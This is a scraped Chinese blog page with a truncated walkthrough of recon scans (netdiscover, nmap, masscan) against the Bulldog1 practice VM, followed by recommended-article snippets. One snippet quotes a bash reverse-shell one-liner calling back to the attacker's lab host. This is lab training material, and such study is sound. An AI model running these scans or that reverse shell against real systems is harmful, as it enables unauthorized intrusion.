渗透测试实战1--bulldog1靶机入侵

最新推荐文章于 2024-07-23 13:49:03 发布
最新推荐文章于 2024-07-23 13:49:03 发布
阅读量735 收藏 3
点赞数 5
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45070118/article/details/98885905

渗透一台linux主机

一.主动信息收集

在这里插入图片描述

扫描网段下的主机
netdiscover -i eth0 -r 192.168.10.129
在这里插入图片描述
主机发现
nmap -sn 192.168.10.1/24
在这里插入图片描述

扫描出5个
1(服务器)-2(网关)-5(是我开着的另一台虚拟机)-132-254(临界)
所以靶机ip为192.168.10.132

接下来扫描端口
masscan --rate=1000 --ports 0-65535 192.168.10.132
在这里插入图片描述
扫描出8080,23,80端口开启

nmap -T4 -sV -O -p 80,23,8080 192.168.10.132
-T4是速度,-sV是版本,-O是操作系统,-p后面带端口
扫描出23是ssh,80是http,8080是http
在这里插入图片描述

dpkg -L dirb
查字典,ka

最低0.47元/天 解锁文章

200万优质内容无限畅学
(Vulnhub练习)--Bulldog1渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
09-18 443
Bulldog1渗透实战 文章转载 靶机渗透测试实战(三)——Bulldog1渗透实战 Bulldog1渗透实战 扫描不到bulldog主机ip ​ 【1】从新启动bulldog,到开机页面选择第二个Ubuntu的高级选项。 ​ 【2】进入高级选项,再次选择第二个Linux内核版本的恢复模式回车。 选择root一行回车,进入命令行模式。 vim /etc/network/interfaces ,修改网卡名称成步骤查询的结果,保存。 auto ens33 iface ens33 inet dhcp reb
渗透测试实战2——bulldog1靶机入侵
浅浅的博客
04-25 1087
一、实验环境 攻击机(Kali):192.168.247.160 靶机bulldog1):192.168.247.148 二、实验步骤 (一)主动信息收集 1、主机发现 2、端口扫描 3、端口服务版本扫描 (二)Web渗透 http服务(80端口) 1、访问目标主机 没有发现什么有用信息。 2、网站指纹信息扫描(whatweb) ...
靶机实战-bulldog1
滕财然的博客
01-19 1116
bulldog1-靶机实战靶机实战bulldog11、主机发现2、扫描端口3、web渗透(80端口)4、提权 靶机实战bulldog1 先要知道对方的IP是否存活,也就是主机发现 1、主机发现 netdiscover -i etho -r IP/网段 属于主动 -i 指定网卡 -r 指定网段 找到目标靶机IP:192.168.232.134 也可以用nmap -sn 扫,看自己心情。...
白菜新手渗透测试靶机练习bulldog1
weixin_43912601的博客
09-01 645
步骤 1.信息收集:ip 端口 服务 操作系统 版本 2.漏洞扫描或漏洞发现:eg:ms17-010 3.漏洞利用:拿到shell 4.提权 5.留后门,清痕迹 6.渗透测试报告 主机发现: dhclient 动态获取ip netdiscover -i eth0 -r 192.168.68.0/24 nmap 192.168.68.0/24 -sn nmap -T4 -sV -O -p 80,2...
bulldog-1靶机 write up 源码 MD5解密得到密码到后台 命令执行&&绕过 反弹shell string分析文件得到密码提权
YouthBelief的博客
11-30 2087
bulldog-1靶机 write up0x00 环境搭建0x01 信息收集0x02 漏洞挖掘web漏洞思路ssh 利用思路步骤1:浏览网页 爆破目录步骤二: 破解hash步骤三:利用密码登录后台步骤四:利用命令执行(需要尝试绕过方法)步骤五:反弹shell0x03 提升权限步骤六:查看系统用户,确定需要关注的用户步骤七:查找每个用户的文件步骤八:拼接root密码提权0x04 思路总结 0x00 环境搭建 下载接 https://download.vulnhub.com/bulldog/bulld
渗透测试实战2--bulldog2靶机入侵
qq_45070118的博客
08-08 531
信息收集 用户先登录,用dhclient自动获取ip Kali Nmap扫描 nmap -sn 192.168.10.1/24 扫描端口 masscan --rate=10000 --ports 0-65535 192.168.10.133 扫描开放端口的详细信息 nmap -sV -T4 -p 80 192.168.10.133 searchsploit nginx 网站版本 ka...
渗透测试实战3——bulldog2靶机入侵
浅浅的博客
04-25 1149
一、实验环境 Kali攻击机:192.168.247.149 bulldog 2靶机192.168.247.150、(192.168.247.151) 开始之前,需先登录bulldog2。账号:dirty,密码:pass,并使其获取IP 二、实验步骤 (一)主动信息收集 1、扫描存活主机 2、扫描开放端口(192.168.247.150和192.168.247.151开...
2.Bulldog渗透实战
qq_46389295的博客
03-25 400
攻击机:Kali 攻击机ip:192.168.56.102 主机发现 端口扫描 版本侦测 访问80,8080端口是一样的网站 在http://192.168.56.101:8080界面没有发现有价值的信息 进行目录爆破 访问http://192.168.56.101:8080/admin/ 发现用户登录界面 访问http://192.168.56.101:8080/dev/ 新的网站将完...
靶机渗透(二)bulldog1
qq_42180996的博客
04-26 1677
靶机bulldog1 一、实验环境 二、实验步骤 (一)信息收集 1.查询测试机IP地址,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/namp) (二)http服务(80/8080端口) 1.靶机开启apache服务,尝试web渗透 2.网站指纹信息扫描(whatweb) 3.目录扫描(dirb) 4.查看/admin页面 5....
bulldog1靶场渗透
b1n的博客
08-26 313
echo 'bash -i >& /dev/tcp/192.168.22.135/1234 0>&1' | bash #中间的ip是主机kali的地址,监听端口设置的啥就写啥。4、然后再去访问http://192.168.22.139/admin,用刚才的猜想用邮箱前的疑似用户名加上后面解密出的当做用户名和密码进行登录。5、再去访问http://192.168.22.139/dev/shell,发现可以成功访问,列出来的命令都可以执行。
default.asp
06-09
default.asp 安装iis必须用到的好东西,许多地方都找不到。
asp+access注入网站源码
02-19
个人博客:实战初级SQL注入-access篇,所涉及的网站源码,如有侵权冒犯,请联系我。
asp-sql注入源码
04-17
asp-sql注入源码(存在sql注入的asp源代码,供大家学习)
vulnhub靶场,bulldog1
kukudeshuo的博客
08-12 308
vulnhub靶场,bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128) 靶机bulldog1192.168.109.157) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.157 使用nmap扫描查看目标靶机端口开放
Bulldog:2靶机渗透
weixin_34345560的博客
02-07 351
文章首发圈子社区:https://www.secquan.org/Notes/1068825 前言 前两天做了一个靶机渗透题目,在此记录一下 靶机信息: 靶机名称 Bulldog:2 渗透步骤: 一、获取靶机IP 成功搭建靶机后,界面显示了ip地址: 但如果靶机没有显示ip,可以用nmap扫描网段得到ip。 二、浏览网站 网站的功能很简单,注册、登录以及浏览一些...
RabbitMQ普通集群搭建指南
P.Dragon|geekery.cn
07-23 1189
在开始之前,确保所有节点上都已安装RabbitMQ Server。为了允许节点间通信,需要确保所有节点上的.erlang.cookie文件内容相同。一些有用没用的历史命令!节点复制cookie到其他节点。文件以正确解析各节点的名称。这表明集群已经成功建立,并且。作为RAM节点加入了集群。同时,设置主机名和修改。
bulldog 靶机
weixin_51559599的博客
10-19 249
在此界面的源码中发现了疑似加密的信息,依次解密查看。
靶机渗透测试实战(三)——Bulldog1渗透实战
橘子女侠
05-09 3875
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (1)信息收集——主机发现 (2)信息收集——端口扫描 (3)信息收集——操作系统扫描 (4)Web渗透 四. 实验总结 一. 实验环境 靶机:IP地址暂时未知; 测试机:kali IP地址:192.168.37.131 测试机:物理机win7 二. 实验流程 信息收集——主机发现 信息收集——端口扫描 ...
RocketMQ学习笔记
m0_37635053的博客
10-11 1592
rocketMQ的学习笔记
vulnhub-bulldog2靶机渗透扫描不出靶机ip
最新发布
04-03
### 关于VulnHub Bulldog2靶机无法扫描到IP的解决方案 在渗透测试过程中,如果遇到无法通过常规手段扫描到目标主机的情况,可以尝试多种技术组合来定位目标主机。以下是针对此问题的具体分析和建议: #### 使用ARP...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值